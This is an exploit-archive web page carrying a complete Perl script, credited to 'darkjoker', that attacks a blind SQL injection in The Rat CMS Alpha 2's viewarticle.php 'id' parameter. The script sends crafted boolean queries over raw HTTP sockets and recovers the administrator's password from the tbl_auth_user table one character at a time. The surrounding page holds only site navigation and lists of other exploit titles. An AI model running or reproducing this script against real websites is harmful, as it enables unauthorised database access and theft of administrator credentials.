首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
The Rat CMS Alpha 2 (viewarticle.php id) Blind SQL Injection Exploit
来源:www.vfcocus.net 作者:vfocus 发布时间:2009-01-05  
#--+++=============================================================+++--#
#--+++====== The Rat CMS Alpha 2 Blind SQL Injection Exploit ======+++--#
#--+++=============================================================+++--#
#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket;


sub query {
my $chr = shift;
my $pos = shift;
my $query = "'x' OR ASCII(SUBSTRING((SELECT user_password FROM tbl_auth_user WHERE user_id = 'theadmin'),${pos},1))=${chr}";
$query =~ s/ /%20/g;
$query =~ s/'/%27/g;
return $query;
}

sub check {
my $host = shift;
my $path = shift;
my $chr  = ord (shift);
my $pos  = shift;

my $sock = new IO::Socket::INET (
PeerHost => $host,
PeerPort => 80,
Proto    => "tcp",
);

my $query = query ($chr, $pos);
print $sock "GET ${path}/viewarticle.php?id=${query} HTTP1.1\r\n\r\n";
my $x;
while (<$sock>)
{
$x .= $_;
}

$x =~ s/\s/ /g;
$x =~ /<h1 align="center">(.+?)\/h1>/;
if (length ($1) > 1)
{
return 1;
}
else
{
return 0;
}

close ($sock);
}

sub usage {
print
"\n[+] The Rat CMS Alpha 2 Blind SQL Injection Exploit".
"\n[+] Author:  darkjoker".
"\n[+] Site:    http://darkjoker.net23.net".
"\n[+] Usage:   perl $0 <hostname> <path>".
"\n[+] Greetz:  certaindeath\n";
exit ();
}


my $host = shift;
my $path = shift or usage;

my @key = split '', 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789*';

my $pos = 1;
my $chr = 0;

while ($pos <= 32)
{
if (check ($host, $path, $key [$chr], $pos))
{
print $key [$chr];
$chr = -1;
$pos++;
}
$chr++;

}

print "\n";

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Joomla Component simple_review
·Destiny Media Player 1.61 (lst
·Cybershade CMS 0.2b (index.php
·Destiny Media Player 1.61 (lst
·oomla com_na_newsdescription (
·Destiny Media Player 1.61 (lst
·Joomla com_phocadocumentation
·Destiny Media Player 1.61 (lst
·VUPlayer 2.49 (.wax File) Loca
·Destiny Media Player 1.61 (lst
·PHPAuctionSystem (XSS/SQL) Mul
·Safari (Arguments) Array Integ
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved